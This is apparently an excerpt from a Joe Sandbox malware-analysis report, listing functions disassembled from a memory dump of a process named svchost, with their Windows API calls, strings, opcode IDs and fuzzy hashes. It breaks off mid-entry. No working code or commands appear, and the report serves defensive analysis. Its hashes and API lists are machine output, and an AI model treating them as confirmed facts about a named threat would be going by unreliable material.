                                      • Instruction Fuzzy Hash: 1B217132A0C65AC1E6609F12A40023977F4FB41BA4F144931EE4D8F68CDF3CE8D58B00
                                      APIs
                                        • Part of subcall function 00007FF669ABE638: ResetEvent.KERNEL32 ref: 00007FF669ABE651
                                        • Part of subcall function 00007FF669ABE638: ReleaseSemaphore.KERNEL32 ref: 00007FF669ABE667
                                      • ReleaseSemaphore.KERNEL32 ref: 00007FF669ABE2DC
                                      • CloseHandle.KERNELBASE ref: 00007FF669ABE2FB
                                      • DeleteCriticalSection.KERNEL32 ref: 00007FF669ABE312
                                      • CloseHandle.KERNEL32 ref: 00007FF669ABE31F
                                        • Part of subcall function 00007FF669ABE3C4: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF669ABE2C7,?,?,?,00007FF669AB398E,?,?,?), ref: 00007FF669ABE3CB
                                        • Part of subcall function 00007FF669ABE3C4: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF669ABE2C7,?,?,?,00007FF669AB398E,?,?,?), ref: 00007FF669ABE3D6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 502429940-0
                                      • Opcode ID: 90b84fc582fb9ace1cc5f02649ca45b98255c4d1b8865a573d452fb2aaa2ba32
                                      • Instruction ID: 6ae2e139c5a0ab55eae1fa2bfccdf216aac8c5f134a6d38eaa89eb4401581b2e
                                      • Opcode Fuzzy Hash: 90b84fc582fb9ace1cc5f02649ca45b98255c4d1b8865a573d452fb2aaa2ba32
                                      • Instruction Fuzzy Hash: A2018036A14E81D2E648DF25E58426C73B0FB88B90F000030DF6E5B265CF38E4B5C780
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 1ec38dfac997f3b76e363a93e2e6f2561c49e5ee44695f5b4ed3b045c800863f
                                      • Instruction ID: a262a5b016629e234b69f945f59b9ea9b900c84753a800ce633113d8d0c4a33c
                                      • Opcode Fuzzy Hash: 1ec38dfac997f3b76e363a93e2e6f2561c49e5ee44695f5b4ed3b045c800863f
                                      • Instruction Fuzzy Hash: A4E012A0E0960AC2FF085F71A95913B61B0AF5EB41F044839CC1ECE760ED3CA4564784
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Thread$CreatePriority
                                      • String ID: CreateThread failed
                                      • API String ID: 2610526550-3849766595
                                      • Opcode ID: f3f7f80d4933b12da82244f1bfbbbe9cf8b675e49d8c8317c5dcc956099d30eb
                                      • Instruction ID: dc63d505827b2f9585d1296e82169488bad44d98afe92135f98a75487b61fae6
                                      • Opcode Fuzzy Hash: f3f7f80d4933b12da82244f1bfbbbe9cf8b675e49d8c8317c5dcc956099d30eb
                                      • Instruction Fuzzy Hash: B511A031A18A8AC2EB00DF14F9402BA73B1FF84794F544535DE8D8A669EF3CE596C780
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: DirectoryInitializeMallocSystem
                                      • String ID: riched20.dll
                                      • API String ID: 174490985-3360196438
                                      • Opcode ID: a3d624d86219b46f3ab891c8d3dca2a181e167ce5578f5fb4ad5dabd9666b930
                                      • Instruction ID: b46b024a075a020c6bed4dad7948ebfbb3e1749d548620aa592e859dcce1e492
                                      • Opcode Fuzzy Hash: a3d624d86219b46f3ab891c8d3dca2a181e167ce5578f5fb4ad5dabd9666b930
                                      • Instruction Fuzzy Hash: A8F04F72518A85C2EB009F60E8541BEB7B0FF89754F440135ED8D8A754DFBCD148CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AutoCompleteFindWindow
                                      • String ID: Edit
                                      • API String ID: 4260060072-554135844
                                      • Opcode ID: 0bf6792ba6b16c54987e888777afc7d46ebe88a53e7a22299ffe9b7451d3dbc3
                                      • Instruction ID: 08d397cb996889eac24cd1c6f84c4ccc29f771b9fbb42aa3d1be67fd65ad9e69
                                      • Opcode Fuzzy Hash: 0bf6792ba6b16c54987e888777afc7d46ebe88a53e7a22299ffe9b7451d3dbc3
                                      • Instruction Fuzzy Hash: 3EE04F51E08747C2FF559F6669506F663B06FAE745F4C5430CD0E9E2519E3CE0998390
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CloseOpen_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2726353707-0
                                      • Opcode ID: f17db2da33f98faead7ef3021073b097f4d7377557522e44b45a10ce9a79b3e1
                                      • Instruction ID: 228609d552826a6202d6aa8887f79aa21d580a5c9290adae8a2fd4ad19ec4921
                                      • Opcode Fuzzy Hash: f17db2da33f98faead7ef3021073b097f4d7377557522e44b45a10ce9a79b3e1
                                      • Instruction Fuzzy Hash: 4A419A62B14A16CAEB60CF75D9416BD33B1FB48B98F049531DE5DABB98DE38D481C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2371198981-0
                                      • Opcode ID: 81b04a57050c804bf2220a5a3d270367df96f0cba2c3b757bd24458c94084a57
                                      • Instruction ID: 8f4349cf981fcb86607d499b8c2a022a84b023469cccbdcb6670ab772a189359
                                      • Opcode Fuzzy Hash: 81b04a57050c804bf2220a5a3d270367df96f0cba2c3b757bd24458c94084a57
                                      • Instruction Fuzzy Hash: 9B41C361B08686D3EA149F62E4442B9B3B5EB08BE4F544631DE6C8FBD5EE7CE085C344
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2272807158-0
                                      • Opcode ID: cbe05c6f41b36f102e2b904fb475d20df200c29fe6038046e5b0e417de8fcbb7
                                      • Instruction ID: 1113a6b84a1607071b402caabf6341061570b9443384ceecc46013909dab0b71
                                      • Opcode Fuzzy Hash: cbe05c6f41b36f102e2b904fb475d20df200c29fe6038046e5b0e417de8fcbb7
                                      • Instruction Fuzzy Hash: DD41AD62A18685C6EB208F25E44427D77F0FB85BB8F105725DEAD4AAD9DF3CD4818700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                      • String ID:
                                      • API String ID: 3251591375-0
                                      • Opcode ID: 16fcc6d8014ebe9b95963f248a73e7089ea4c55891c651092eebe75313f1c669
                                      • Instruction ID: f0f283ab0ab52b08da1f3188813e6258996685aa891e9a5f3d85770c2240d96f
                                      • Opcode Fuzzy Hash: 16fcc6d8014ebe9b95963f248a73e7089ea4c55891c651092eebe75313f1c669
                                      • Instruction Fuzzy Hash: 88310925A0C283C2FA64AF6894653B932F1AF45744F444438EE4ECF7E7DE2DA90ED251
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2176759853-0
                                      • Opcode ID: 3190c73dd7f0bb3a6cb742ca0208c4183a88647e9d1f2705cf460e2263798c2f
                                      • Instruction ID: 432f571694954dd13d86f2079efa37879fcf7f0483a03e073cc38128b26f6dc0
                                      • Opcode Fuzzy Hash: 3190c73dd7f0bb3a6cb742ca0208c4183a88647e9d1f2705cf460e2263798c2f
                                      • Instruction Fuzzy Hash: 6E319E62A28B8682EA148F65A54017AB3B0FBC9BD0F145336EF9D47B95DF3CE1918740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1203560049-0
                                      • Opcode ID: c8c6e0c2b0d9cb8ef71824fc15a08c7ddbb49ec0023c59ee185242b0c6f6144d
                                      • Instruction ID: b226d4adb608a49ae3decff8d64e712fb28d0fa4ca6baaa2ff810acb82d92639
                                      • Opcode Fuzzy Hash: c8c6e0c2b0d9cb8ef71824fc15a08c7ddbb49ec0023c59ee185242b0c6f6144d
                                      • Instruction Fuzzy Hash: 3821B562B18A86C2EA20DF25E44127D73F4FF88794F105331EEDD8A699EF3CD5858600
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3118131910-0
                                      • Opcode ID: ca7f2cad624a123dd3b671b9aca72798331b070848934483982a09eb1cead94d
                                      • Instruction ID: 0b260e7ad71f7512aad18ee9a9d92a88c28a6b9c67fa05697afb6ea84edabc16
                                      • Opcode Fuzzy Hash: ca7f2cad624a123dd3b671b9aca72798331b070848934483982a09eb1cead94d
                                      • Instruction Fuzzy Hash: 4221B262A18786C1EA20CF28E45116E73F0FFD8B94F101331EE9D8AAA9EF3CD541C600
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1203560049-0
                                      • Opcode ID: 9bfc93c056ba89222d5a42510e3e472ad13f6330e180e5838c0227c6c227b7e6
                                      • Instruction ID: 2a2f9132db33111a0f623dddbea5532579a98f3b7e8ea6f3b781cc8753740214
                                      • Opcode Fuzzy Hash: 9bfc93c056ba89222d5a42510e3e472ad13f6330e180e5838c0227c6c227b7e6
                                      • Instruction Fuzzy Hash: A4219262E18A85C2EA10DF28E45512E73F1FBD8794F100332EEAD8BA99DF3CD5818704
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 52933b5126259a84873ed224b23ac546879e6639a0a69e10b2fe31aad4917163
                                      • Instruction ID: 73ce7ff943dd0f089548f1cc57401f9d9277b890fd74bb5ea3ea32713ac7f2c2
                                      • Opcode Fuzzy Hash: 52933b5126259a84873ed224b23ac546879e6639a0a69e10b2fe31aad4917163
                                      • Instruction Fuzzy Hash: 0BE09221B08756C6FA546F65988527932B3AF88B56F145438CC0A9A392CE3DA84D9241
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: R
                                      • API String ID: 3668304517-1466425173
                                      • Opcode ID: f8697226b86766db27669fc06746c4b8cc90a6edc3a3a8ae6b855d0951e54e35
                                      • Instruction ID: c952b1a32cfc07f1595139233361309b56202bee83b039866929cd9ed36f969f
                                      • Opcode Fuzzy Hash: f8697226b86766db27669fc06746c4b8cc90a6edc3a3a8ae6b855d0951e54e35
                                      • Instruction Fuzzy Hash: FED18C22B08682D7EB688F2996402B9B7F5FB55B84F044035EF5D8B7A5CF3CE4658710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 7a00cbce75fcb2630a89b87c22264d9d21c0623f02072ce0e5287556a19477fc
                                      • Instruction ID: 9fa74a3ea8142ad6e8c804ecb2c1d48adadb153c3ae73dc470edb22d9a7f200d
                                      • Opcode Fuzzy Hash: 7a00cbce75fcb2630a89b87c22264d9d21c0623f02072ce0e5287556a19477fc
                                      • Instruction Fuzzy Hash: 01417B62F14652C7FB10DFB5D8412BD33B1AF45B98F144235EE1DABADADE38A4828300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 7e2dea938e983f45b81d1208f1a86833f757bef61826bd7ee1cd8c41ffdbe08d
                                      • Instruction ID: 984d07c8e730849c8b0e9fed1537c62d2472491856ae26aa7f1c24ccd61e9bad
                                      • Opcode Fuzzy Hash: 7e2dea938e983f45b81d1208f1a86833f757bef61826bd7ee1cd8c41ffdbe08d
                                      • Instruction Fuzzy Hash: B6318222B1969AC6EAA44F69D5946B933F4BF05BD4F140132DE1DCB7D8EF2CE8528300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Item_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1746051919-0
                                      • Opcode ID: 9347057ea0fe5049396486d5cd20caaf911be9976955e2a818b816b586ee0dfb
                                      • Instruction ID: 5da898dd7c30324ed703b965076c44577dc72272e470b78ecad5ccd57ee16b84
                                      • Opcode Fuzzy Hash: 9347057ea0fe5049396486d5cd20caaf911be9976955e2a818b816b586ee0dfb
                                      • Instruction Fuzzy Hash: 4231E322E1878283EA108F25E45537A73B0FF84794F505235EE9C4BB96DF3CE5958740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: 1daf210f7d1e71829005616e7aeefb4b91ac6c2890f93594a25159253e67cee3
                                      • Instruction ID: de1c028fff3e229323f4c0df312318bf5412d93d71339207ae2e5a0b60303cf4
                                      • Opcode Fuzzy Hash: 1daf210f7d1e71829005616e7aeefb4b91ac6c2890f93594a25159253e67cee3
                                      • Instruction Fuzzy Hash: 7021D322E0D78AD5EE618E52D8017BA77F0AF01B98F144131DE4C8A399EF3CE996C300
                                      APIs
                                      • DloadMakePermanentImageCommit.DELAYIMP ref: 00007FF669AD1215
                                      • VirtualProtect.KERNELBASE(?,?,?,?,00000000,00007FF669AD0F96,?,?,?,00007FF669AD137D), ref: 00007FF669AD126E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CommitDloadImageMakePermanentProtectVirtual
                                      • String ID:
                                      • API String ID: 1359380325-0
                                      • Opcode ID: d7065fdead552cd7c24bae6690dff7b267eb41f4dd761d5dc4f4ae79aff033b5
                                      • Instruction ID: af4b9d4422a0f610d6dcdd63ff6f4c6e5e962abc0b600bea34d6eb3b90615b7a
